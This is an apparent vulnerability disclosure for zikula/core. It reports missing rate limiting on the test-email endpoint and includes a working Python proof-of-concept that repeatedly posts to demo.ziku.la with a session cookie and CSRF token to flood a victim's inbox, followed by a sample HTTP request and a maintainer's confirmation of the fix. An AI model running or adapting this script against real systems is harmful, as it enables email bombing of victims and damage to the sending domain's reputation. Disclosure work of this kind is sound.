Insufficient Granularity of Access Control in zikula/core
Reported on
Jan 3rd 2022
Description
When sending test emails, you're able to spam a target email address with as many emails as an attacker wants to a victim's email address due to lack of rate limiting (/mailer/config/test)
I've put together a simple Python script that exploits this and would allow you to send a custom amount of emails to any victim's email address.
Proof of Concept
# spammailer.py
# Example usage: python3 spammailer.py -csrf "JHja3y8NfO1LWy0UiJ4sC6NxzQoc064tCLQVko6PSj4" -cookie "sqrv94auln8thq23032rflgjc8" -subject "test" -message "test" -email "fuspehulmi@vusra.com"
import requests, argparse
def spammer(csrfToken, cookie, email, subject, message):
data = {
"zikulamailermodule_test[toName]": "Test",
"zikulamailermodule_test[toAddress]": email,
"zikulamailermodule_test[subject]": subject,
"zikulamailermodule_test[messageType]": "text",
"zikulamailermodule_test[bodyHtml]": "",
"zikulamailermodule_test[bodyText]": message,
"zikulamailermodule_test[test]": "",
"zikulamailermodule_test[_token]": csrfToken
}
headers = {
"Host": "demo.ziku.la",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": str(len(data)),
"Origin": "https://demo.ziku.la",
"DNT": "1",
"Connection": "keep-alive",
"Referer": "https://demo.ziku.la/mailer/config/test",
"Cookie": "_zsid=" + cookie,
"Upgrade-Insecure-Requests": "1",
"Sec-GPC": "1",
"TE": "Trailers",
"Pragma": "no-cache",
"Cache-Control": "no-cache"}
r = requests.post("https://demo.ziku.la/mailer/config/test", headers=headers, data=data)
print(r.status_code)
parser = argparse.ArgumentParser()
parser.add_argument("-csrf", "--csrf-token", required=True, help="Your CSRF token.")
parser.add_argument("-cookie", "--cookie", required=True, help="Your session cookie")
parser.add_argument("-email", "--email", required=True, help="The victim email address")
parser.add_argument("-subject", "--subject", required=True, help="The subject line of the email")
parser.add_argument("-message", "--message", required=True, help="the message of the email")
arguments = parser.parse_args()
# Increase this number within parenthesis to increase the number of emails sent
for i in range(10):
spammer(arguments.csrf_token, arguments.cookie, arguments.email, arguments.subject, arguments.message)
Request:
POST /mailer/config/test HTTP/1.1
Host: demo.ziku.la
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://demo.ziku.la/mailer/config/test
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
Origin: https://demo.ziku.la
DNT: 1
Connection: keep-alive
Cookie: _zsid=4pl4j2sj5m5ee4csbcsq9saqjh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
Impact
The impact of this will be negative on the targeted email address and also negative on the ziku.la domain (and other domains when the web application is hosted using another domain and emails are sent from a different domain) since it's possible that the victim would report the domain as a spam domain, resulting in a reputational damage to the domain.
Thanks for this report. Added rate limiting like you suggested. Note the fix is not applied to the demo page yet, as this is running an older version at the moment.